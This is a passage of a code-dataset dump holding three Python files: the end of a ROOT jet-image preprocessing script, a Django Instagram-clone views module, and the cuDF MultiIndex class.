jEvent.pIndex[j][k]\n # print(\"\\t\\tsubmax: %d\" % submax)\n # \n phi_submax = getPhi(pEvent, submax)\n eta_submax = getEta(pEvent, submax)\n\n # print(\"pt[maxm] for jet %d: %f\" % (k, pEvent.pt[maxm]))\n # print(\"pt[submax] for jet %d: %f\" % (k, pEvent.pt[submax]))\n\n\n histsubmaxcheck.Fill(pEvent.pt[maxm], pEvent.pt[submax])\n\n return phi_maxm, eta_maxm, phi_submax, eta_submax\n\ndef fRotate(jEvent, j, phi, eta, phi_maxm, eta_maxm, phi_submax, eta_submax):\n if(len(jEvent.pIndex[j])>1):\n # print(\"phi before rotate: %f\" % phi)\n # print(\"phi_maxm to be rotated around: %f\" % phi_maxm)\n star = math.atan2((eta_maxm-eta_submax), (phi_maxm-phi_submax))\n\n alpha = math.atan2(eta,phi) #fill in numbers\n r = math.sqrt(math.pow(phi, 2) + math.pow(eta, 2))\n phi = r * math.cos(alpha-star)\n eta = r * math.sin(alpha-star)\n\n # print('phi after rotate %f' % phi)\n\n\n\n return phi, eta\n\ndef fTranslate(phi, eta, phi_maxm, eta_maxm):\n # print(\"phi_maxm = %f\" % phi_maxm)\n # print(\"eta_maxm = %f\" % eta_maxm)\n\n # print(\"phi before translate = %f\" % phi)\n # print(\"eta before translate = %f\" % eta)\n\n phi = phi - phi_maxm\n eta = eta - eta_maxm\n # print(\"phi after translate = %f\" % phi)\n # print(\"eta after translate = %f\\n\" % eta)\n\n return phi, eta\n\ndef fReflect_Fill_Print(output, iEvent, jEvent, j, phiTempV, etaTempV, ptTempV, sumEtaPos, sumEtaNeg, histReflect, histJetTemp, collisionType):\n if(len(jEvent.pIndex[j])>1):\n # if(len(jEvent.pIndex[j])>1):\n for i, a in enumerate(etaTempV):\n if(sumEtaPos < sumEtaNeg):\n a = -1*a\n #fill the histogram for reflection\n histReflect.Fill(phiTempV[i], a, ptTempV[i])\n #fill a temporary histogram with data from one jet\n histJetTemp.Fill(phiTempV[i], a, ptTempV[i])\n\n printOutput(output, j, iEvent, histJetTemp, dimension, collisionType)\n\n return etaTempV\n\ndef fNormalize(ptTempV):\n outVector = []\n ptSum = np.sum(ptTempV)\n for i in ptTempV:\n outVector.append(i/ptSum)\n return outVector\n\n # for i, a in enumerate(etaTempV):\n # histNormalize.Fill(phiTempV[i], a, (ptTempV[i]/eTot))\n # return histNormalize\n\n # if(eTot > 0):\n # print 'NOTE'\n # else:\n # print 'wut'\n\ndef readTree(filename1, filename2, fileOut, dimension, collisionType, folder):\n\n fIn = ROOT.TFile(filename1, \"READ\")\n tree = fIn.Get(\"tree\")\n tree.Print()\n #read in the other tree\n fIn2 = ROOT.TFile(filename2, \"READ\")\n jetTree = fIn2.Get(\"jetTree\")\n jetTree.Print()\n\n histBefore = ROOT.TH2F(\"histBefore\", \"histBefore\", dimension, -2*math.pi, 2*math.pi, dimension, -5, 5) #bin bound bound bin bound bound\n histBefore.GetXaxis().SetTitle(\"phi\");\n histBefore.GetYaxis().SetTitle(\"eta\");\n histBefore.GetZaxis().SetTitle(\"counts weighted by pt\");\n\n histCentre = ROOT.TH2F(\"histCentre\", \"histCentre\", dimension, -HIST_BOUND, HIST_BOUND, dimension, -HIST_BOUND, HIST_BOUND) #bin bound bound bin bound bound\n histCentre.GetXaxis().SetTitle(\"phi\");\n histCentre.GetYaxis().SetTitle(\"eta\");\n histCentre.GetZaxis().SetTitle(\"counts weighted by pt\");\n\n histRotate = ROOT.TH2F(\"histRotate\", \"histRotate\", dimension, -HIST_BOUND, HIST_BOUND, dimension, -HIST_BOUND, HIST_BOUND) #bin bound bound bin bound bound\n histRotate.GetXaxis().SetTitle(\"phi\");\n histRotate.GetYaxis().SetTitle(\"eta\");\n histRotate.GetZaxis().SetTitle(\"counts weighted by pt\");\n\n histTranslate = ROOT.TH2F(\"histTranslate\", \"histTranslate\", dimension, -HIST_BOUND, HIST_BOUND, dimension, -HIST_BOUND, HIST_BOUND) #bin bound bound bin bound bound\n histTranslate.GetXaxis().SetTitle(\"phi\");\n histTranslate.GetYaxis().SetTitle(\"eta\");\n histTranslate.GetZaxis().SetTitle(\"counts weighted by pt\");\n\n histReflect = ROOT.TH2F(\"histReflect\", \"histReflect\", dimension, -HIST_BOUND, HIST_BOUND, dimension, -HIST_BOUND, HIST_BOUND) #bin bound bound bin bound bound\n histReflect.GetXaxis().SetTitle(\"phi\");\n histReflect.GetYaxis().SetTitle(\"eta\");\n histReflect.GetZaxis().SetTitle(\"counts weighted by pt\");\n\n histJetTemp = ROOT.TH2F(\"histJetTemp\", \"histJetTemp\", dimension, -HIST_BOUND, HIST_BOUND, dimension, -HIST_BOUND, HIST_BOUND) # numBins bound bound bin bound bound\n histJetTemp.GetXaxis().SetTitle(\"phi\");\n histJetTemp.GetYaxis().SetTitle(\"eta\");\n histJetTemp.GetZaxis().SetTitle(\"counts weighted by pt\");\n\n histsubmaxcheck = ROOT.TH2F(\"histsubmaxcheck\", \"histsubmaxcheck\", dimension, 0, 100, dimension, 0, 100) # numBins bound bound bin bound bound\n histsubmaxcheck.GetXaxis().SetTitle(\"pt of max\");\n histsubmaxcheck.GetYaxis().SetTitle(\"pt of submax\");\n histsubmaxcheck.GetZaxis().SetTitle(\"counts\");\n\n # histNormalize = ROOT.TH2F(\"histNormalize\", \"histNormalize\", dimension, -HIST_BOUND, HIST_BOUND, dimension, -HIST_BOUND, HIST_BOUND) # numBins bound bound bin bound bound\n # histNormalize.GetXaxis().SetTitle(\"phi\");\n # histNormalize.GetYaxis().SetTitle(\"eta\");\n # histNormalize.GetZaxis().SetTitle(\"counts weighted by pt\");\n\n canvasBefore = ROOT.TCanvas(\"canvasBefore\", \"canvasBefore\")\n canvasCentre = ROOT.TCanvas(\"canvasCentre\", \"canvasCentre\")\n canvasRotate = ROOT.TCanvas(\"canvasRotate\", \"canvasRotate\")\n canvasTranslate = ROOT.TCanvas(\"canvasTranslate\", \"canvasTranslate\")\n canvasReflect = ROOT.TCanvas(\"canvasReflect\", \"canvasReflect\")\n canvasSubmaxCheck = ROOT.TCanvas(\"canvasSubmaxCheck\", \"canvasSubmaxCheck\")\n # canvasNormalize = ROOT.TCanvas(\"canvasNormalize\", \"canvasNormalize\")\n\n iEvent = 0\n\n # open('outputC.txt', 'w').close()\n # outputC = open(\"outputC.txt\" , \"w\" )\n\n # open('outputR.txt', 'w').close()\n # outputR = open(\"outputR.txt\" , \"w\" )\n\n # open('outputT.txt', 'w').close()\n # outputT = open(\"outputT.txt\" , \"w\" )\n\n # open('outputF.txt', 'w').close()\n # outputF = open(\"outputF.txt\" , \"w\" )\n\n open(fileOut, 'w').close()\n outputN = open(fileOut , \"w\" )\n\n\n#LOOP: through each event in tree\n for pEvent, jEvent in izip(tree, jetTree): #zip\n # if (iEvent==1):\n # break\n if (iEvent % 100 == 0):\n print(\"Event %d:\" % iEvent)\n #for event in jetTree:\n # print(\"jEvent.nJets is %d\" %jEvent.nJets)\n # print(\"pEvent.nParticles is %d\" %pEvent.nFinalParticles)\n#LOOP: through each jet in event \n for j in range(jEvent.nJets): #j tells you which jet you are in\n # print(\"This is what j is: \")\n # print(j)\n # if(j == 1):\n # break\n\n # print(\"\\tJet number %d\" %j)\n # print(\"\\tjEvent.pIndex[j][0] = %d\" % jEvent.pIndex[j][0])\n \n phiTempV = []\n etaTempV = []\n ptTempV = []\n sumEtaPos = 0\n sumEtaNeg = 0\n sumEtaZero = 0\n\n phi_maxm, eta_maxm, phi_submax, eta_submax = findMaxSubmax(jEvent, pEvent, j, histsubmaxcheck)\n # print('max phi before centre: %f' % phi_maxm)\n # print('for max:')\n phi_maxm, eta_maxm = fCentre(jEvent, j, phi_maxm, eta_maxm)\n # print('for submax:')\n phi_submax, eta_submax = fCentre(jEvent, j, phi_submax, eta_submax)\n # print('now the rest is about the max: \\n')\n # print('phi_max before rotate: %f' % phi_maxm)\n phi_maxR, eta_maxR = fRotate(jEvent, j, phi_maxm, eta_maxm, phi_maxm, eta_maxm, phi_submax, eta_submax)\n # print('phi_max after rotate: %f' % phi_maxR)\n # print('\\n')\n\n for index in (jEvent.pIndex[j]):\n phi, eta = getPhi(pEvent, index), getEta(pEvent, index)\n\n histBefore.Fill(phi, eta, pEvent.pt[index])\n \n phi, eta = fCentre(jEvent, j, phi, eta)\n histCentre.Fill(phi, eta, pEvent.pt[index])\n #centre the max and submax\n \n phi, eta = fRotate(jEvent, j, phi, eta, phi_maxm, eta_maxm, phi_submax, eta_submax)\n histRotate.Fill(phi, eta, pEvent.pt[index])\n\n phi, eta = fTranslate(phi, eta, phi_maxR, eta_maxR)\n histTranslate.Fill(phi , eta, pEvent.pt[index])\n\n\n if(eta > 0):\n sumEtaPos += pEvent.pt[index]\n elif(eta < 0):\n sumEtaNeg += pEvent.pt[index]\n else:\n sumEtaZero += pEvent.pt[index]\n \n etaTempV.append(eta)\n phiTempV.append(phi)\n ptTempV.append(pEvent.pt[index])\n # print ('sum eta pos: %f' % sumEtaPos)\n # print ('sum eta Neg: %f' % sumEtaNeg)\n # print ('sum eta Zero: %f' % sumEtaZero)\n # print ('sum eta pn: %f' % (sumEtaPos + sumEtaNeg))\n\n ptTempV = fNormalize(ptTempV)\n # print 'len pt'\n # print len(ptTempV)\n # print ptTempV[21]\n etaTempV = fReflect_Fill_Print(outputN, iEvent, jEvent, j, phiTempV, etaTempV, ptTempV, sumEtaPos, sumEtaNeg, histReflect, histJetTemp, collisionType)\n # print ('sum eta pn: %f' % (sumEtaPos + sumEtaNeg))\n\n # eTot = sumEtaPos + sumEtaNeg + sumEtaZero\n # histNormalize = fNormalize(jEvent, phiTempV, etaTempV, ptTempV, eTot, histNormalize, dimension, collisionType)\n\n etaTempV = []\n phiTempV = []\n ptTempV = []\n histJetTemp.Reset()\n\n\n \n # printOutput(outputC, j, iEvent, histCentre, dimension, collisionType)\n # printOutput(outputR, j, iEvent, histRotate, dimension, collisionType)\n # printOutput(outputT, j, iEvent, histTranslate, dimension, collisionType)\n # printOutput(outputN, j, iEvent, histNormalize, dimension, collisionType)\n # printOutput(outputN, j, iEvent, histReflect, dimension, collisionType)\n# \n \n iEvent+=1\n\n\n #see others for examples of iterating through\n canvasBefore.cd()\n histBefore.Draw(\"LEGO2Z\")\n canvasBefore.SaveAs(folder + \"/\" + filename1.split('.')[0] + \"_\" + str(dimension) + \"_before_pt.pdf\")\n\n canvasCentre.cd()\n # canvasCentre.SetLogz()\n histCentre.Draw(\"LEGO2Z\")\n #https://root.cern.ch/root/html534/guides/users-guide/Histograms.html\n canvasCentre.SaveAs(folder + \"/\" + filename1.split('.')[0] + \"_\" + str(dimension) + \"_centre_pt.pdf\")\n\n canvasRotate.cd()\n # canvasRotate.SetLogz()\n histRotate.Draw(\"LEGO2Z\")\n canvasRotate.SaveAs(folder + \"/\" + filename1.split('.')[0] + \"_\" + str(dimension) + \"_rotate_pt.pdf\")\n\n canvasTranslate.cd()\n # canvasTranslate.SetLogz()\n histTranslate.Draw(\"LEGO2Z\")\n canvasTranslate.SaveAs(folder + \"/\" + filename1.split('.')[0] + \"_\" + str(dimension) + \"_translate_pt.pdf\")\n\n canvasReflect.cd()\n # canvasReflect.SetLogz()\n histReflect.Draw(\"LEGO2Z\")\n canvasReflect.SaveAs(folder + \"/\" + filename1.split('.')[0] + \"_\" + str(dimension) + \"_reflect_pt.pdf\")\n\n canvasSubmaxCheck.cd()\n histsubmaxcheck.Draw(\"LEGO2Z\")\n canvasSubmaxCheck.SaveAs(folder + \"/\" + filename1.split('.')[0] + \"_\" + str(dimension) + \"_submaxCheck_pt.pdf\")\n \n # canvasNormalize.cd()\n # histNormalize.Draw(\"LEGO2Z\")\n # canvasNormalize.SaveAs(\"normalize.pdf\")\n \nif __name__ == \"__main__\":\n\n \n parser = argparse.ArgumentParser()\n parser.add_argument('--data', default='sampleA.root', help='the original root file of event data')\n parser.add_argument('--jets', default='r1.0/sampleAJet.root', help='the original root file of event data')\n parser.add_argument('--type', default='A', help='type of collision(collision ID)')\n parser.add_argument('--dim', default='11', help='dimension of output image', type=int)\n parser.add_argument('--folder', default='r1.0', help='folder to place output image')\n args = parser.parse_args()\n \n filename1=args.data\n filename2=args.jets\n dimension=args.dim\n folder=args.folder\n collisionType=args.type\n\n if(filename1 == \"\"):\n filename1 = raw_input(\"Please provide filename 1 (a .root file from original tree): \")\n if(filename2 == \"\"):\n filename2 = raw_input(\"Please provide filename 2 (a .root file after original tree goes through jet finder): \")\n if(collisionType == \"\"):\n collisionType = raw_input(\"Enter the collision type: \")\n if (dimension == 0):\n dimension = getDimension()\n if(folder == \"\"):\n folder = raw_input(\"Please provide folder where you would like everything to go: \")\n\n#give tree, jettree, output txt, collisiontype= , dimension= \n\n fileOut = folder + \"/\" + filename2.split('/')[1].split('.')[0] + \"Pre\" + str(dimension) + \"_pt.txt\"\n print(\"fileOut: %s\" % fileOut)\n print(\"filename2: %s\" % filename2)\n\n\n print(\"folder: %s\" % folder)\n\n readTree(filename1 = filename1, filename2 = filename2, fileOut = fileOut, dimension = dimension, collisionType = collisionType, folder = folder)\n \n\n\n","sub_path":"JetAnalysis/prept.py","file_name":"prept.py","file_ext":"py","file_size_in_byte":16660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"559021802","text":"from django.shortcuts import (\r\n render , \r\n redirect\r\n)\r\nfrom ProfileApp.models import (\r\n Profile,\r\n Follower\r\n)\r\nfrom .models import (\r\n Post , \r\n Comments, \r\n Like, \r\n Story\r\n)\r\nfrom django.shortcuts import get_object_or_404\r\nfrom .forms import (\r\n CommentsForm, \r\n NewPostForm,\r\n PostEditForm\r\n)\r\nfrom django.views.generic import ListView, View\r\nfrom django.contrib.auth.models import User \r\nfrom django.contrib.auth import authenticate , login , logout\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.contrib.auth.mixins import LoginRequiredMixin\r\nfrom django.core.exceptions import ObjectDoesNotExist\r\nfrom datetime import datetime \r\nfrom django.utils import timezone\r\nimport random\r\n# Create your views here.\r\nclass IndexView(ListView, LoginRequiredMixin):\r\n model = Post\r\n template_name='home/index.html'\r\n def get(self, request):\r\n if request.user.is_authenticated : \r\n form = CommentsForm \r\n # posts from people you followed\r\n user = Profile.objects.get(user=self.request.user)\r\n profile_page = Profile.objects.all() \r\n following = user.following.all()\r\n following_ids = []\r\n for x in following:\r\n following_ids.append(x.id) \r\n print(following_ids) \r\n following_ids.append(user.id)\r\n posts_qs = Post.objects.filter(author__id__in=following_ids).order_by('-date')\r\n\r\n #notification\r\n all_posts = Post.objects.filter(author=request.user)\r\n notification = []\r\n for post in all_posts:\r\n like_qs = Like.objects.filter(po=post).order_by('-date')\r\n comments_qs = Comments.objects.filter(po=post).order_by('-date')\r\n\r\n for like in like_qs:\r\n if like.user == request.user :\r\n pass\r\n else:\r\n notification.append(like)\r\n for comment in comments_qs:\r\n if comment.user == request.user :\r\n pass\r\n else:\r\n notification.append(comment)\r\n followers_qs = Follower.objects.filter(influncer=request.user).order_by('-date')\r\n for follower in followers_qs:\r\n if follower == request.user :\r\n pass\r\n else:\r\n notification.append(follower)\r\n # notification.sort(key = lambda date: datetime.strptime(date, \"%m%d%Y %I:%M\"))\r\n\r\n # stories \r\n\r\n me = Profile.objects.get(user=request.user)\r\n my_following = me.following.all()\r\n my_following_stories = []\r\n for following in my_following:\r\n stories_qs = Story.objects.filter(author=following.user)\r\n active = False \r\n now = timezone.now()\r\n for active_story in stories_qs : \r\n if active_story.end_date <= now:\r\n active_story.active = False\r\n active_story.save()\r\n if active_story.active == True :\r\n active = True\r\n else :\r\n pass\r\n if stories_qs.exists():\r\n if active == True:\r\n my_following_stories.append(following.id) \r\n else:\r\n pass\r\n\r\n all_stories = Profile.objects.filter(user__id__in=my_following_stories)\r\n # my stories\r\n my_profile = Profile.objects.get(user=request.user)\r\n my_profile_stories = Story.objects.filter(author=my_profile.user)\r\n now = timezone.now()\r\n for my_sotry in my_profile_stories:\r\n if my_sotry.end_date <= now:\r\n my_sotry.active = False\r\n my_sotry.save()\r\n\r\n #new post form\r\n\r\n post_form = NewPostForm\r\n\r\n # people you my like to follow\r\n p_may_follow = Profile.objects.exclude(user__id__in=following_ids)\r\n if len(p_may_follow) > 5:\r\n y = 5\r\n else:\r\n y = len(p_may_follow)\r\n\r\n\r\n context = {\r\n 'title':'InstaClone',\r\n 'profile':profile_page,\r\n 'profile_stories':profile_page,\r\n 'form':form,\r\n 'posts':posts_qs, \r\n 'notifications':notification,\r\n 'my_stories':my_profile,\r\n 'stories':all_stories,\r\n 'post_form':post_form,\r\n 'p_may_follow':random.choices(p_may_follow,k=y)\r\n }\r\n return render(self.request,'home/posts.html', context)\r\n else :\r\n return redirect('login')\r\n\r\n@login_required\r\ndef AddCommentView(request, pk):\r\n if request.method == 'POST':\r\n post = get_object_or_404(Post, id=pk)\r\n form = CommentsForm(request.POST)\r\n if form.is_valid():\r\n post_comment = form.cleaned_data.get('post_comment')\r\n comments = Comments(\r\n user=request.user,\r\n comment = post_comment,\r\n po = post\r\n )\r\n comments.save() \r\n return redirect('index')\r\n\r\n@login_required\r\ndef LikeAndDislikeView(request, pk):\r\n post = get_object_or_404(Post, id=pk)\r\n \r\n like = Like(\r\n user=request.user,\r\n po=post\r\n )\r\n liker = Like.objects.filter(po=post, user=request.user)\r\n if liker:\r\n post.post_likes_number -=1\r\n post.save()\r\n liker.delete() \r\n else: \r\n post.post_likes_number +=1\r\n post.save()\r\n like.save() \r\n return redirect('index')\r\n \r\n@login_required\r\ndef StoriesDetiels(request, pk):\r\n now = timezone.now()\r\n profile = get_object_or_404(Profile, id=pk)\r\n stories = []\r\n stories_qs = Story.objects.filter(author=profile.user)\r\n for story in stories_qs :\r\n if story.active == True:\r\n stories.append(story)\r\n\r\n for my_story in stories:\r\n my_story.views += 1\r\n my_story.collor = 'B'\r\n my_story.save()\r\n\r\n context = {\r\n 'stories':stories,\r\n 'first_story':stories,\r\n 'profile_stories':profile,\r\n }\r\n\r\n if len(stories)>0:\r\n\r\n context.update({\r\n 'stories':stories[1:],\r\n 'first_story':stories[0],\r\n 'profile_stories':profile,\r\n }) \r\n\r\n return render(request, 'home/story_detiels.html', context)\r\n\r\n@login_required\r\ndef exploreView(request):\r\n\r\n posts = Post.objects.all().order_by('-post_likes_number')\r\n\r\n all_posts = Post.objects.filter(author=request.user)\r\n notification = []\r\n for post in all_posts:\r\n like_qs = Like.objects.filter(po=post)\r\n comments_qs = Comments.objects.filter(po=post)\r\n for like in like_qs:\r\n if like.user == request.user :\r\n pass\r\n else:\r\n notification.append(like)\r\n for comment in comments_qs:\r\n if comment.user == request.user :\r\n pass\r\n else:\r\n notification.append(comment)\r\n context={\r\n 'posts':posts,\r\n 'notifications':notification\r\n \r\n }\r\n\r\n return render(request, 'home/explore.html', context)\r\n\r\n@login_required\r\ndef SearchView(request):\r\n profiles = User.objects.all()\r\n myFilter = request.GET.get('myUsers')\r\n if myFilter != ' ' and myFilter is not None:\r\n profiles = profiles.filter(username__icontains=myFilter)\r\n\r\n context = {\r\n 'myUsers':profiles,\r\n }\r\n\r\n return render (request, 'home/search.html', context)\r\n\r\n@login_required\r\ndef AddPostView(request):\r\n print(f'this is request post {request.POST}')\r\n if request.method == 'POST':\r\n print(f'this is request post after {request.POST}')\r\n form = NewPostForm(request.POST, request.FILES)\r\n \r\n if form.is_valid():\r\n image = form.cleaned_data.get('image')\r\n discription = form.cleaned_data.get('discription')\r\n post_type = form.cleaned_data.get('post_type')\r\n print(f'this is request post valid {request.POST}')\r\n if post_type == 'F':\r\n Post.objects.create(\r\n author = request.user,\r\n image = image,\r\n discription = discription\r\n )\r\n else:\r\n Story.objects.create(\r\n author = request.user,\r\n image = image,\r\n discription = discription\r\n )\r\n return redirect('index')\r\n\r\ndef DeletPostView(request, pk):\r\n post = get_object_or_404(Post, id=pk)\r\n if post.author == request.user:\r\n post.delete()\r\n return redirect('index')\r\n \r\ndef EditPostView(request, pk):\r\n post = Post.objects.get(id=pk)\r\n context = {\r\n 'post':post,\r\n }\r\n\r\n if post.author == request.user:\r\n form = PostEditForm (instance = post)\r\n if request.method == 'POST':\r\n form = PostEditForm(request.POST, instance=post.discription)\r\n if form.is_valid():\r\n form.save()\r\n return redirect('index')\r\n else : \r\n form = PostEditForm\r\n\r\n context.update({\r\n 'form':form\r\n }) \r\n return render(request,'home/editpost.html', context)\r\n else:\r\n return redirect('index')\r\n \r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"363559258","text":"# Copyright (c) 2019, NVIDIA CORPORATION.\n\nimport pandas as pd\nimport numpy as np\nimport warnings\n\nfrom collections.abc import Sequence\n\nfrom cudf.dataframe import columnops\nfrom cudf.comm.serialize import register_distributed_serializer\nfrom cudf.dataframe.index import Index, StringIndex\n\n\nclass MultiIndex(Index):\n \"\"\"A multi-level or hierarchical index.\n\n Provides N-Dimensional indexing into Series and DataFrame objects.\n\n Properties\n ---\n levels: Labels for each category in the index hierarchy.\n codes: Assignment of individual items into the categories of the hierarchy.\n names: Name for each level\n \"\"\"\n\n def __init__(self, levels, codes=None, labels=None, names=None):\n self.names = names\n column_names = []\n if labels:\n warnings.warn(\"the 'labels' keyword is deprecated, use 'codes' \"\n \"instead\", FutureWarning)\n if labels and not codes:\n codes = labels\n if isinstance(names, (Sequence,\n pd.core.indexes.frozen.FrozenNDArray,\n pd.core.indexes.frozen.FrozenList)):\n if sum(x is None for x in names) > 1:\n column_names = list(range(len(codes)))\n else:\n column_names = names\n elif names is None:\n column_names = list(range(len(codes)))\n else:\n column_names = names\n if len(codes) == 0:\n raise ValueError('MultiIndex codes can not be empty.')\n import cudf\n if not isinstance(codes, cudf.dataframe.dataframe.DataFrame) and\\\n not isinstance(codes[0], (Sequence,\n pd.core.indexes.frozen.FrozenNDArray)):\n raise TypeError('Codes is not a Sequence of sequences')\n if not isinstance(codes, cudf.dataframe.dataframe.DataFrame):\n self.codes = cudf.dataframe.dataframe.DataFrame()\n for idx, code in enumerate(codes):\n code = np.array(code)\n self.codes.add_column(column_names[idx],\n columnops.as_column(code))\n else:\n self.codes = codes\n self.levels = levels\n self._validate_levels_and_codes(self.levels, self.codes)\n self.name = None\n self.names = names\n\n def _validate_levels_and_codes(self, levels, codes):\n levels = np.array(levels)\n if len(levels) != len(codes.columns):\n raise ValueError('MultiIndex has unequal number of levels and '\n 'codes and is inconsistent!')\n code_length = len(codes[codes.columns[0]])\n for index, code in enumerate(codes):\n if code_length != len(codes[code]):\n raise ValueError('MultiIndex length of codes does not match '\n 'and is inconsistent!')\n for index, code in enumerate(codes):\n if codes[code].max() > len(levels[index])-1:\n raise ValueError('MultiIndex code %d contains value %d larger '\n 'than maximum level size at this position')\n\n def copy(self, deep=True):\n mi = MultiIndex(self.levels.copy(),\n self.codes.copy(deep))\n if self.names:\n mi.names = self.names.copy()\n return mi\n\n def deepcopy(self):\n return self.copy(deep=True)\n\n def __copy__(self):\n return self.copy(deep=True)\n\n def _popn(self, n):\n \"\"\" Returns a copy of this index without the left-most n values.\n\n Removes n names, labels, and codes in order to build a new index\n for results.\n \"\"\"\n from cudf import DataFrame\n codes = DataFrame()\n for idx in self.codes.columns[n:]:\n codes.add_column(idx, self.codes[idx])\n result = MultiIndex(self.levels[n:], codes)\n result.names = self.names[n:]\n return result\n\n def __repr__(self):\n return \"MultiIndex(levels=\" + str(self.levels) +\\\n \",\\ncodes=\" + str(self.codes) + \")\"\n\n @property\n def labels(self):\n warnings.warn(\"This feature is deprecated in pandas and will be\"\n \"dropped from cudf as well.\", FutureWarning)\n return self.codes\n\n def _compute_validity_mask(self, df, row_tuple):\n \"\"\" Computes the valid set of indices of values in the lookup\n \"\"\"\n validity_mask = []\n for i, element in enumerate(row_tuple):\n index_of_code_at_level = None\n for level_index in range(len(self.levels[i])):\n if self.levels[i][level_index] == element:\n index_of_code_at_level = level_index\n break\n if index_of_code_at_level is None:\n raise KeyError(element)\n matches = []\n for k, code in enumerate(self.codes[self.codes.columns[i]]):\n if k in validity_mask or len(validity_mask) == 0:\n if code == index_of_code_at_level:\n matches.append(k)\n if len(matches) != 0:\n validity_mask = matches\n return validity_mask\n\n def _get_row_major(self, df, row_tuple):\n valid_indices = self._compute_validity_mask(df, row_tuple)\n from cudf import Series\n result = df.take(Series(valid_indices))\n # Build new index - INDEX based MultiIndex\n # ---------------\n from cudf import DataFrame\n out_index = DataFrame()\n # Select the last n-k columns where n is the number of source\n # levels and k is the length of the indexing tuple\n for k in range(len(row_tuple), len(df.index.levels)):\n out_index.add_column(df.index.names[k],\n df.index.codes[df.index.codes.columns[k]])\n # If there's only one column remaining in the output index, convert\n # it into a StringIndex and name the final index values according\n # to the proper codes.\n if len(out_index.columns) == 1:\n out_index = []\n for val in result.index.codes[result.index.codes.columns[len(result.index.codes.columns)-1]]: # noqa: E501\n out_index.append(result.index.levels[\n len(result.index.codes.columns)-1][val])\n # TODO: Warning! The final index column could be arbitrarily\n # ordered integers, not Strings, so we need to check for that\n # dtype and produce a GenericIndex instead of a StringIndex\n out_index = StringIndex(out_index)\n out_index.name = result.index.names[len(result.index.names)-1]\n result.index = out_index\n else:\n # Otherwise pop the leftmost levels, names, and codes from the\n # source index until it has the correct number of columns (n-k)\n if(len(out_index.columns)) > 0:\n result.reset_index(drop=True)\n result.index = result.index._popn(len(row_tuple))\n return result\n\n def _get_column_major(self, df, row_tuple):\n valid_indices = self._compute_validity_mask(df, row_tuple)\n from cudf import DataFrame\n result = DataFrame()\n for ix, col in enumerate(df.columns):\n if ix in valid_indices:\n result[ix] = list(df._cols.values())[ix]\n # Build new index - COLUMN based MultiIndex\n # ---------------\n if len(row_tuple) < len(self.levels):\n columns = self._popn(len(row_tuple))\n result.columns = columns.take(valid_indices)\n else:\n result.columns = self.take(valid_indices)\n if len(result.columns.levels) == 1:\n columns = []\n for code in result.columns.codes[result.columns.codes.columns[0]]:\n columns.append(result.columns.levels[0][code])\n name = result.columns.names[0]\n result.columns = StringIndex(columns, name=name)\n return result\n\n def __len__(self):\n return len(self.codes[self.codes.columns[0]])\n\n def __eq__(self, other):\n if not hasattr(other, 'levels'):\n return False\n return self.levels == other.levels and\\\n self.codes == other.codes and\\\n self.names == other.names\n\n @property\n def is_contiguous(self):\n return True\n\n @property\n def size(self):\n return len(self.codes[0])\n\n def take(self, indices):\n from collections.abc import Sequence\n from cudf import Series\n from numbers import Integral\n if isinstance(indices, (Integral, Sequence)):\n indices = np.array(indices)\n elif isinstance(indices, Series):\n indices = indices.to_gpu_array()\n codes = self.codes.take(indices)\n result = MultiIndex(self.levels, codes)\n result.names = self.names\n return result\n\n def __iter__(self):\n self.n = 0\n return self\n\n def __next__(self):\n if self.n < len(self.codes):\n result = self[self.n]\n self.n += 1\n return result\n else:\n raise StopIteration\n\n def __getitem__(self, index):\n match = self.take(index)\n result = []\n for level, item in enumerate(match.codes):\n result.append(match.levels[level][match.codes[item][0]])\n return tuple(result)\n\n @property\n def _values(self):\n return list([i for i in self])\n\n @classmethod\n def from_tuples(cls, tuples, names=None):\n # Use Pandas for handling Python host objects\n pdi = pd.MultiIndex.from_tuples(tuples, names=names)\n result = cls.from_pandas(pdi)\n return result\n\n @classmethod\n def from_frame(cls, dataframe, names=None):\n # Use Pandas for handling Python host objects\n pdi = pd.MultiIndex.from_frame(dataframe.to_pandas(), names=names)\n result = cls.from_pandas(pdi)\n return result\n\n @classmethod\n def from_product(cls, arrays, names=None):\n # Use Pandas for handling Python host objects\n pdi = pd.MultiIndex.from_product(arrays, names=names)\n result = cls.from_pandas(pdi)\n return result\n\n def to_pandas(self):\n pandas_codes = []\n for code in self.codes.columns:\n pandas_codes.append(self.codes[code].to_array())\n # Backwards compatibility:\n # Construct a dummy MultiIndex and check for the codes attr.\n # This indicates that it is pandas >= 0.24\n # If no codes attr is present it is pandas <= 0.23\n if hasattr(pd.MultiIndex([[]], [[]]), 'codes'):\n return pd.MultiIndex(levels=self.levels, codes=pandas_codes,\n names=self.names)\n else:\n return pd.MultiIndex(levels=self.levels, labels=pandas_codes,\n names=self.names)\n\n @classmethod\n def from_pandas(cls, multiindex):\n \"\"\"\n Convert from a Pandas MultiIndex\n\n Raises\n ------\n TypeError for invalid input type.\n\n Examples\n --------\n >>> import cudf\n >>> import pandas as pd\n >>> pmi = pd.MultiIndex(levels=[['a', 'b'], ['c', 'd']],\n codes=[[0, 1], [1, ]])\n >>> cudf.from_pandas(pmi)\n MultiIndex( ... )\n \"\"\"\n if not isinstance(multiindex, pd.MultiIndex):\n raise TypeError('not a pandas.MultiIndex')\n\n if hasattr(multiindex, 'codes'):\n mi = cls(levels=multiindex.levels,\n codes=multiindex.codes,\n names=multiindex.names)\n else:\n mi = cls(levels=multiindex.levels,\n codes=multiindex.labels,\n names=multiindex.names)\n return mi\n\n\nregister_distributed_serializer(MultiIndex)\n","sub_path":"python/cudf/dataframe/multiindex.py","file_name":"multiindex.py","file_ext":"py","file_size_in_byte":11877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
